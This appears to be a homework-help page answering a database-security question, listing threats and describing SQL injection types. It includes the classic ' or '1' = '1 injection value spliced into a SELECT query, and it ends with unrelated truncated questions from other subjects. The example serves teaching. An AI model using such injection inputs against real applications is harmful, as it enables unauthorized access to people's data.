Database Security
a) Identify and briefly explain three main threats to database
security
b) Give an example of SQL injection where an SQL SELECT statement has been manipulated to bypass authentication
Answer :
I have mentioned all the important threats learn 3 from them and have a look on rest of them.
A)Database Security Threats:
Excessive privileges:- When users (or applications) are granted database privileges that exceed the requirements of their job function, these privileges may be used to gain access to confidential information. The solution to this problem is query-level access control. Query-level access control restricts privileges to minimum-required operations and dataPrivilege abuse: Users may abuse legitimate data access privileges for unauthorized purposes. The solution is access control policies that apply not only to what data is accessible, but how data is accessed. By enforcing policies for time of day, location, and application client and volume of data retrieved, it is possible to identify users who are abusing access privileges.
Unauthorized privilege elevation
Attackers may take advantage of vulnerabilities in database management software to convert low-level access privileges to high-level access privileges.
Platform vulnerabilities
Vulnerabilities in underlying operating systems may lead to unauthorized data access and corruption. For example, the Blaster worm took advantage of a Windows 2000 vulnerability to take down target servers. IPS tools are a good way to identify and/or block attacks designed to exploit known database platform vulnerabilities.
SQL injection
SQL injection attacks involve a user who takes advantage of vulnerabilities in front-end web applications and stored procedures to send unauthorized database queries, often with elevated privileges. Using SQL injection, attackers could even gain unrestricted access to an entire database.
Denial of service
Denial of service (DoS) may be invoked through many techniques. Common DoS techniques include buffer overflows, data corruption, network flooding and resource consumption.
Malware
Cybercriminals, state-sponsored hackers, and spies use advanced attacks that blend multiple tactics – such as spear phishing emails and malware – to penetrate organizations and steal sensitive data. Unaware that malware has infected their device; legitimate users become a conduit for these groups to access your networks and sensitive data.
Storage Media Exposure
Backup storage media is often completely unprotected from attack. As a result, numerous security breaches have involved the theft of database backup disks and tapes. Furthermore, failure to audit and monitor the activities of administrators who have low-level access to sensitive information can put your data at risk. Taking the appropriate measures to protect backup copies of sensitive data and monitor your most highly privileged users is not only a data security best practice, but also mandated by many regulations.
Weak authentication
Weak authentication schemes allow attackers to assume the identity of legitimate database users. Specific attack strategies include brute force attacks, social engineering, and so on. Implementation of passwords or two-factor authentication is a must. For scalability and ease-of-use, authentication mechanisms should be integrated with enterprise directory/user management infrastructures.
B)
Types of SQL Injection Attacks with Examples:
SQL injection attacks can be carried out in a number of ways. Attackers may observe a system’s behavior before selecting a particular attack vector/method.
Unsanitized Input
Unsanitized input is a common type of SQLi attack in which the attacker provides user input that isn’t properly sanitized for characters that should be escaped, and/or the input isn’t validated to be the type that is correct/expected.
For example, a website used to pay bills online might request the user’s account number in a web form and then send that to the database to pull up the associated account information. If the web application is building a SQL query string dynamically with the account number the user provided, it might look something like this:
“SELECT * FROM customers WHERE account = ‘“ + userProvidedAccountNumber +”’;”
While this works for users who are properly entering their account number, it leaves the door open for attackers. For example, if someone decided to provide an account number of “‘ or ‘1’ = ‘1”, that would result in a query string of:
“SELECT * FROM customers WHERE account = ‘’ or ‘1’ = ‘1’;”
Due to the ‘1’ = ‘1’ always evaluating to TRUE, sending this statement to the database will result in the data for all customers being returned instead of just a single customer.
Blind SQL Injection
Also referred to as Inferential SQL Injection, a Blind SQL injection attack doesn’t reveal data directly from the database being targeted. Rather, the attacker closely examines indirect clues in behavior. Details within HTTP responses, blank web pages for certain user input, and how long it takes the database to respond to certain user input are all things that can be clues depending on the goal of the attacker. They could also point to another SQLi attack avenue for the attacker to try.
Out-of-Band Injection
This attack is bit more complex and may be used by an attacker when they cannot achieve their goal in a single, direct query-response attack. Typically, an attacker will craft SQL statements which, when presented to the database, will trigger the database system to create a connection to an external server the attacker controls. In this fashion, the attacker can harvest data or potentially control behavior of the database.
A Second Order Injection is a type of Out-of-Band Injection attack. In this case, the attacker will provide an SQL injection that will get stored and executed by a separate behavior of the database system. When the secondary system behavior occurs (it could be something like a time-based job or something triggered by other typical admin or user use of the database) and the attacker’s SQL injection is executed, that’s when the “reach out” to a system the attacker controls happens.
Database Security a) Identify and briefly explain three main threats to database security b) Give an...
Question 5 (20 marks) a) Identify and briefly explain the three data anomalies found in a database design. (9 marks) b) What is normalisation? Name the three normal forms and their intended use. (9 marks) c) In resolving data anomalies, what exactly has normalisation achieve in a database design? (2 marks)
My SQL -----database---- What restrictions apply to the use of the aggregate functions within the SELECT statement? How do nulls affect the aggregate functions? Give a complete example, Explain how the GROUP BY clause works. What is the different between the WHERE and HAVING clauses? Give an example
1) Explain in your own words your understanding of the three main financial statements and give an example of each using a company. eg this is Dell's Income Statement?
ALL THE QUESTIONS BELOW ARE BASED ON CYBER SECURITY COURSE. SO PLEASE ASN THE QUESTION. THE NAME OF THE TOPIC IS "DATABASE AND DATA CENTER SECURITY" In Database and Data Center Security. What is Piggybacking attack? A) Give real life example? B) Give one SQL code example of Piggybacking attack? C) How do you minimize the chances of this attack? Le Q4 Then there isa Piggyback attack a 4 Select the record of the studen whase, name is Robert close...
1.Briefly explain the evolution of the Web highlighting the main characteristics of each version. 2. Give one example for each one of the following type of use of data mining?
Describe each questions: Explain why the object-oriented database model was developed. How does the OID in the OO model differ from the primary key in the relational model? Is it possible for a superkey not to be a candidate key? Why or why not? Briefly describe the four types of binary relationships possible between an entity set A and an entity set B based on relationship cardinality. Sales Database: Customer(custId, lastName, firstName, address, phone, creditLimit) Order(orderNumber, date, total, custID) LineItem(orderNumber,...
1. (a) What are the three functions of money? (b) Explain each function briefly and (c) give example per function. You have to answer each part
please answer 8 my precious were incorrect E. Identify and briefly describe the diversity (how manysecies and geographic distribution of the two main lineages of extant sarcopterygian fish. Names of lineages (towed 6n ny) How many species Distribution 8. Chondrichthyes have a long evolutionary history. (5) A. In class, we discussed the three main radiations of Chondrichthyes. As discussed in class, identify and briefly describe how three features associated with feeding (also discussed in your text) and locomotion changed during...
1. An entity invests in a security that is not, in form, common stock. Identify a characteristic of that security that would support a determination (even if not conclusively) that the security is in-substance common stock 2. Identify one condition that must be met for an asset group to be classified as held for sale. 3. What is the main condition for reporting a disposed component as a discontinued operation? 4. Company X leases property for 10 years under which...
(a) Briefly explain three (3) methods of material selection. (3 marks) (b) With suitable example, explain three (3) types of design (6 marks)